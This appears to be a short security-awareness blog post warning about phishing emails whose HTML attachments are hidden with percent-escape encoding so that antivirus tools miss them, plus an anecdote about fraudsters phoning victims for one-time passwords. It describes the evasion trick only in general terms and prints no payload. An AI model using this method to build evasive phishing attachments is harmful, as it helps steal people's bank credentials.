You often find phishing attacks in your email and they are sometimes removed by the antivirus software in your organisation. One of the ways you are protected is the antivirus scanning attachments and quarantine infected emails, however they are using ‘escaped’ characters and let the browser interpret the escape characters and then interpret that as normal HTML code.
The normal emails that you see often tried to send you a link which you click on, and this will take you to a compromised site that looks similar to your bank website and try and dupe you to enter your logon credentials.
Later attempts by fraudsters adding an attachment which when you opened it with a text reader, you could easily see that it was NOT from your bank.
Recently some attempt is made to hide this from you as a reader and some antivirus scanning tools. This version we see includes a modified attachment, which seems official if you peek inside.
The fraudsters uses an encoding mechanism that would have replaced each character with the equivalent ASCII code. For example the ‘spacebar’ or space character (‘ ‘) cannot be used in a web address so an escaped space character is used viz. ‘%20’. The spacebar’s ASCII’s value is 32, however a computer reads hexadecimal, and this is 20hex.
The fraudsters would take their text they want to attach to the email and encode all using escape sequences. This result is attached as an HTML file to the email.
Once you click on the attachment, the browser will load the file, execute the decode function and then present the resultant HTML to the user.
It is becoming very difficult for the end-users to ascertain if the email is valid or not as sometimes they are expecting information from their banks and it just becomes a habit to click and complete the information.
A war story I have heard from a contractor is that he received email from his bank on his mobile phone (or that’s what he thought) and forwarded that to his accountant. He received a SMS for his OTP (One Time Password) which he realised is a phishing attempt and his accountant must have entered information on the phishing website. He phoned his accountant to inform him not to complete anything online as it is a phishing attempt. He said that a few minutes after he put the phone down speaking to the accountant, someone phoned him to help him complete the online details to the bank as it was not done properly.
In this case the fraudsters are sitting actively waiting for people to logon and will even phone you pretending to be from the bank to obtain your logon details.
In the final image, you see the decoded message as the browser will see and execute it.
Be vigilant and share information so that people are not scammed out of their hard earned money.
Practice safe HEX!